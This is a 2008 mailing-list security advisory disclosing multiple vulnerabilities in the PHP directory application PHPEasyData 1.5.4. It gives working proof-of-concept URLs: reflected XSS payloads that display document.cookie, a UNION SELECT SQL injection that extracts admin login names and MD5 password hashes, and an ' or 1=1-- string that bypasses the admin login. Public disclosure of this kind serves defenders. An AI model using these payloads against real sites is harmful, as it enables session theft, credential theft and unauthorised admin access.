Related information

Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

TYPO3 Security Bulletin TYPO3-20080611-1: Multiple vulnerabilities in TYPO3 Core

Many bugs on CMS system Piugame

From:	Sylvain <sylvain.thual_(at)_click-internet.fr>
Date:	11.06.2008
Subject:	PHPEasyData 1.5.4 Multiple Vulnerabilities

-------------
*PHPEasyData*
-------------

Informations :
**************
Langage : PHP
Version : 1.5.4
Website : http://www.phpeasydata.com/
Problems : Multiple vulnerabilities

Description:
************
PHPEasyData is a PHP application which allow you to manage and display on the web your dynamics data and directories.

Details :
*********
---------
** Xss **
---------

There are multiple xss vulnerabilities.
Demonstration exploit URL:

-last_records.php:
http://[website]/last_records.
php?annuaire=%3Cscript%3Ealert(document.
cookie)%3C/script%3E

-annuaire.php:
http://[website]/annuaire.
php?annuaire=30&sort_field=2&cat_id=&by=%3Cscript%3Ealert(
document.cookie)%3C/script%3E

http://[website]/annuaire.
php?annuaire=30&sort_field=2&cat_id=%3Cscript%3Ealert(documen
t.cookie)%3C/script%3E

http://[website]/annuaire.php?annuaire=%3Cscript%3Ealert(document.
cookie)%3C/script%3E


-------------------
** SQL Injection **
-------------------
-annuaire.php
http://[website]/annuaire.
php?annuaire=29%20union%20select%20user_pass,user_login,user_fname,
user_access%20from%20an_users

With this url we can have the admin password(crypted with md5) for example.

-admin/login.php
Due to a lack of sanitization of the user input in admin/login.php we can easily get an access to the admin control panel with the login:
' or 1=1-- /**


Credits:
********
Autor : Sylvain THUAL
E-mail : contact@click-internet.fr
Website : http://www.click-internet.fr